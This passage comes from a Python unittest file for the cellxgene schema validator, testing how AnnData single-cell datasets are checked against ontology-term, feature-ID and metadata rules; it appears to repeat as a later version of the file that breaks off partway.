'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n\n def test_assay_ontology_term_id(self):\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. 
For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'CL:000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0\n ] = 'EFO:0010183 sci-plex'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n\n def test_cell_type_ontology_term_id(self):\n \"\"\"\n cell_type_ontology_term_id categorical with str categories. This MUST be a CL term.\n \"\"\"\n self.validator.adata.obs['cell_type_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid ontology term id of 'CL'.\"\n ])\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. 
When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_all_species(self):\n \"\"\"\n All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10114'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ,\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a child term id of '[['UBERON:0000105']]'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10114'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'UBERON:0000071'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ])\n\n def test_disease_ontology_term_id(self):\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n self.validator.adata.obs['disease_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['disease_ontology_term_id'][0\n ] = 'PATO:0001894'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n\n def test_ethnicity_ontology_term_id(self):\n \"\"\"\n ethnicity_ontology_term_id categorical with str categories.\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n Otherwise, for all other organisms this MUST be \"na\".\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a valid ontology term id of 'HANCESTRO'. 
When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'MmusDv:0000003'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' (Homo sapiens), ethnicity_ontology_term_id MUST be 'na'.\"\n ])\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n\n def test_tissue_ontology_term_id_base(self):\n \"\"\"\n tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_tissue_ontology_term_id_cell_culture(self):\n \"\"\"\n Cell Culture - MUST be a CL term appended with \" (cell culture)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 (CELL culture)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_tissue_ontology_term_id_organoid(self):\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 (ORGANOID)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n\n def test_is_primary_data(self):\n \"\"\"\n is_primary_data\tbool. This MUST be True if this is the canonical instance of this cellular\n observation and False if not. 
This is commonly False\n for meta-analyses reusing data or for secondary views of data.\n \"\"\"\n self.validator.adata.obs['is_primary_data'] = 'FALSE'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'is_primary_data' in dataframe 'obs' must be boolean, not 'object'.\"\n ])\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. 
All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n 
Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. 
This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. 
Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. 
This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-5": "import unittest\n\nimport numpy\nimport pandas as pd\n\nimport fixtures.examples_validate as examples\nfrom cellxgene_schema.validate import Validator\nfrom cellxgene_schema.write_labels import AnnDataLabelAppender\n\n\n# Tests for schema compliance of an AnnData object\n\n\nclass TestValidAnndata(unittest.TestCase):\n\n \"\"\"\n Tests a valid AnnData object. Most other tests below modify this AnnData object and test for failure cases.\n\n The valid AnnData object has all valid cases described in the schema.\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_valid_anndata(self):\n self.validator.validate_adata()\n self.assertFalse(self.validator.errors)\n\n\nclass TestH5adValidation(unittest.TestCase):\n\n \"\"\"\n Checks that validation from h5ad works, only does one invalid example as extensive testing is done in the classes\n below\n \"\"\"\n\n def setUp(self):\n self.h5ad_valid_file = examples.h5ad_valid\n self.h5ad_invalid_file = examples.h5ad_invalid\n self.validator = Validator()\n\n def test_validate(self):\n\n # Valid h5ad\n self.assertTrue(self.validator.validate_adata(self.h5ad_valid_file))\n\n # Invalid h5ads\n self.assertFalse(self.validator.validate_adata(self.h5ad_invalid_file))\n\n\nclass TestExpressionMatrix(unittest.TestCase):\n\n \"\"\"\n Fail cases for expression matrices (anndata.X and anndata.raw.X)\n \"\"\"\n\n def setUp(self):\n\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_shapes(self):\n\n \"\"\"\n All matrix layers MUST have the same shape, and have the same cell labels and gene labels.\n \"\"\"\n\n # Creates a raw layer\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.raw.var.drop(\"feature_is_filtered\", axis=1, inplace=True)\n self.validator.adata.X = examples.adata_non_raw.X.copy()\n self.validator.adata.uns[\"X_normalization\"] = \"CPM\"\n\n # remove one gene\n self.validator.adata = self.validator.adata[:, 1:]\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\"ERROR: Number of genes in X (3) is different than raw.X (4).\"],\n )\n\n def test_sparsity(self):\n\n \"\"\"\n In any layer, if a matrix has 50% or more values that are zeros, it is STRONGLY RECOMMENDED that\n the matrix be encoded as a scipy.sparse.csr_matrix\n \"\"\"\n\n self.validator.adata.X = self.validator.adata.X.toarray()\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.warnings,\n [\n \"WARNING: Sparsity of 'X' is 0.875 which is greater than 0.5, \"\n \"and it is not a 'scipy.sparse.csr_matrix'. 
